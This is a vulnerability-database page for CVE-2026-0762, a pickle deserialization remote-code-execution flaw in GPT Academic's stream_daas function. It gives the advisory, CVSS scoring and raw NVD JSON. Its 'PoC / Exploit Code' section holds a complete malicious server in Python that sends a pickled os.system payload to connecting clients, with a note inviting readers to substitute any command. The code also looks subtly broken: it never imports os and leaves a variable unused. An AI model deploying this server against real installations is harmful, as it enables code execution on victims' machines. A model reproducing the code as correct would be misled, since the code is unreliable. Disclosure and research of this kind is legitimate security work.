Security Vulnerability Report
CVE-2026-0762 CVSS 8.1 HIGH

CVE-2026-0762

Published: 2026-01-23 04:16:03
Last Modified: 2026-02-18 16:41:57

Description

GPT Academic stream_daas Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GPT Academic. Interaction with a malicious DAAS server is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the stream_daas function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27956.

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:binary-husky:gpt_academic:3.91:*:*:*:*:*:*:* - VULNERABLE
GPT Academic, all versions (the stream_daas functionality is affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
'''
CVE-2026-0762 PoC - Malicious DAAS Server for GPT Academic RCE
Note: This is for educational and security research purposes only.
Author: Security Researcher
Reference: ZDI-CAN-27956
'''
import pickle
import base64
import http.server
import socketserver
from urllib.parse import urlparse, parse_qs

# Malicious payload that executes arbitrary command
class RCEPayload:
    def __reduce__(self):
        # Replace 'whoami' with any command you want to execute
        cmd = "whoami"
        return (os.system, (cmd,))

class MaliciousDAASHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        parsed_path = urlparse(self.path)
        if '/stream' in parsed_path.path or '/daas' in parsed_path.path:
            # Generate malicious serialized payload
            payload = pickle.dumps(RCEPayload())
            encoded_payload = base64.b64encode(payload).decode('utf-8')
            # Send malicious response
            self.send_response(200)
            self.send_header('Content-type', 'application/octet-stream')
            self.end_headers()
            self.wfile.write(payload)
            print(f"[+] Sent malicious payload to {self.client_address}")
        else:
            self.send_response(404)
            self.end_headers()

    def log_message(self, format, *args):
        print(f"[*] {self.address_string()} - {format % args}")

def main():
    PORT = 8080
    print(f"[*] Starting malicious DAAS server on port {PORT}")
    print(f"[*] Waiting for GPT Academic to connect...")
    with socketserver.TCPServer(("", PORT), MaliciousDAASHandler) as httpd:
        httpd.serve_forever()

if __name__ == "__main__":
    main()

# Client-side trigger (to be used when GPT Academic connects to malicious server)
# The vulnerable code in stream_daas function will deserialize this payload:
# import pickle
# data = response_from_malicious_server
# obj = pickle.loads(data)  # This triggers RCE

print("\n[!] Disclaimer: This PoC is for authorized security testing only.")
print("[!] Unauthorized access to computer systems is illegal.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0762", "sourceIdentifier": "[email protected]", "published": "2026-01-23T04:16:02.973", "lastModified": "2026-02-18T16:41:56.887", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GPT Academic stream_daas Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GPT Academic. Interaction with a malicious DAAS server is required to exploit this vulnerability but attack vectors may vary depending on the implementation.\n\nThe specific flaw exists within the stream_daas function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27956."}, {"lang": "es", "value": "Vulnerabilidad de ejecución remota de código por deserialización de datos no confiables en GPT Academic stream_daas. Esta vulnerabilidad permite a atacantes remotos ejecutar código arbitrario en instalaciones afectadas de GPT Academic. Se requiere interacción con un servidor DAAS malicioso para explotar esta vulnerabilidad, pero los vectores de ataque pueden variar dependiendo de la implementación.\n\nLa falla específica existe dentro de la función stream_daas. El problema se debe a la falta de validación adecuada de los datos proporcionados por el usuario, lo que puede resultar en la deserialización de datos no confiables. Un atacante puede aprovechar esta vulnerabilidad para ejecutar código en el contexto de root. Fue ZDI-CAN-27956."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:binary-husky:gpt_academic:3.91:*:*:*:*:*:*:*", "matchCriteriaId": "E6552037-FD85-48BB-A474-C85A10783308"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-028/", "source": "[email protected]", "tags": ["Mitigation", "Third Party Advisory"]}]}}